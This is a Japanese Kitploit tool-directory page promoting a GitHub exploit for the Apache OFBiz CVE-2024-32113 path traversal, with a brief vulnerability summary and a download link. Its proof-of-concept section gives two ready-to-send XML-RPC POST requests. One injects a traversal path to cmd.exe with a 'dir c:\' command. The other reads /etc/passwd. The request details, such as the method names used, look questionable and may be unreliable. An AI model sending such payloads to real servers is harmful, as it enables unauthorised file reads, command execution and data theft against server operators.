Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Apache-OFBiz-Directory-Traversal-exploit — Apache OFBiz CVE-2024-32113 のパストラバーサルに対するエクスプロイト。巧妙に細工された XML-RPC リクエストを介して、脆弱なサーバー上で任意のファイル読み取りと潜在的なコマンド実行を可能にします。 | Kitploit
ツール/GitHubGitHub/absholi7ly/apache-ofbiz-directory-traversal-exploit
脆弱性分析エクスプロイトウェブアプリケーション悪用データ流出ウェブセキュリティペネトレーションテスト
GitHubabsholi7ly/apache-ofbiz-directory-traversal-exploit

Apache-OFBiz-Directory-Traversal-exploit

Apache OFBiz CVE-2024-32113 のパストラバーサルに対するエクスプロイト。巧妙に細工された XML-RPC リクエストを介して、脆弱なサーバー上で任意のファイル読み取りと潜在的なコマンド実行を可能にします。

リポジトリを見る
163122年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Apache-OFBiz-Directory-Traversal-exploit

Apache OFBiz 18.12.12 までに、重大(クリティカル)と分類される脆弱性が発見されました。この問題の影響を受けるのは、未知の機能です。未知の入力による操作により、パストラバーサル(ディレクトリトラバーサル)の脆弱性が引き起こされます。この製品は、制限された親ディレクトリの下にあるファイルまたはディレクトリを特定することを意図したパス名を構築するために外部入力を使用しますが、パス名内の特別な要素を適切に無害化しないため、パス名が制限されたディレクトリの外にある場所に解決される可能性があります。影響を受けるのは、機密性、完全性、および可用性です。

はじめに

  • CVE-2024-32113 の脆弱性により、特別に細工された HTTP リクエストを送信することで、Apache OFBiz サーバー上で任意のコード実行が可能になります。
  • このリクエストでは、攻撃者はパラメータ ../../../../../../etc/passwd を使用して、Apache OFBiz サーバー上の etc/passwd ファイルを指し示します。
  • Apache OFBiz サーバーがこのリクエストを処理すると、サーバー上のユーザーに関する機密情報を含む etc/passwd ファイルの読み取りを試みます。
  • この情報は、データの窃取、改ざん、さらには削除など、サーバーに対するさらなる攻撃を実行するために使用される可能性があります。

Poc

1-

POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml

<?xml version="1.0"?>
<methodCall>
  <methodName>performCommand</methodName>
  <params>
    <param>
      <value><string>../../../../../../windows/system32/cmd.exe?/c+dir+c:\</string></value>
    </param>
  </params>
</methodCall>

または

2-

POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml

<?xml version="1.0"?>
<methodCall>
  <methodName>example.createBlogPost</methodName>
  <params>
    <param>
      <value><string>../../../../../../etc/passwd</string></value>
    </param>
  </params>
</methodCall>
ツールをダウンロード